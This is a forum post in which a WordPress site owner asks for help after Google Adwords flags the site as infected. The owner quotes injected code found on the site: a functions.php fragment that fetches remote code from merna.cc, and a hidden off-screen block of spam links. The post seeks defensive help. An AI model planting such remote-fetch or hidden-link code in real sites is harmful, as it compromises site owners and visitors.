Web Hosting
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

WordPress fix HELP: Adwords says my site is infected but IMPOSIBLE TO FIND.

Discussion in 'Misc WordPress Requests' started by emilio1990, Nov 25, 2017.

  1. emilio1990


    HELP: Adwords says my site is infected but IMPOSIBLE TO FIND., by emilio1990

    Hi all, the last thing I wanted to do is asking for help, since I thought I could solve my problem by myself by reading other’s questions’ answers or blogs, but I was not able. Here is my problem:

    I created this website http://www.taxivic.cat years ago but two months ago I did some design updates, even changed the theme. Besides from that, I created another website http://www.koisse.com, sharing the same hosting (one folder is www and the other koisse) but different database (until 24h ago).
    Also, I decided to do some Google Adwords and everything went fine until two weeks ago.

    Google sent me an email saying that I have malware on my site, specifically:


    Manually I found a script in functions.php with “merna.cc”:

    if($tmpcontent = @file_get_contents("http://www.xxxxxx.cc/code1.php"))




    elseif($tmpcontent = @file_get_contents_tcurl("http://www.merna.cc/code1.php"))



    Also a base64 encoded script on header:

    <div style="position:absolute;top:0;left:-9999px;">
    <a href="http://xxxxxxx.com" title="Best Free Joomla Templates & Extensions " target="_blank">All for Joomla</a>
    <a href="http://xxxxxxxxx.net" title="Free Download Website Templates, WordPress Themes, Code Scripts, Plugins, GFX" target="_blank">The Word of Web Design</a>

    The other website http://www.koisse.com was clean of these scripts.

    Once deleted and sent to Google Adwords for revision, Adwords still say my site is “infected”.

    Once deleted all the www folder (www.taxivic.cat), and not even installed a theme or a plugin and using a different database, Google Adwords says my site is still infected.

    I used all the anti-malware plugins I could use, all the scan-websites I could check and all the “manual” tricks I could think of (even downloading the whole website and searching some keywords with Total Commander) and everything looked safe. The only think I am not sure is safe is this I found in http://www.koisse.com using pingdom: data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACGFjVEwAAAABAAAAAcMq2TYAAAANSURBVAiZY2BgYPgPAAEEAQB9ssjfAAAAGmZjVEwAAAAAAAAAAQAAAAEAAAAAAAAAAAD6A+gBAbNU+2sAAAARZmRBVAAAAAEImWNgYGBgAAAABQAB6MzFdgAAAABJRU5ErkJggg== (when I decode it it downloads a .png picture to my computer which Kaspersky says it’s fine).

    Can anyone tell me or check where are those links or scripts on my website?

    I think I tried it all and I am a bit desperate.

    Thank You.


    HELP: Adwords says my site is infected but IMPOSIBLE TO FIND.

Share This Page

Web Hosting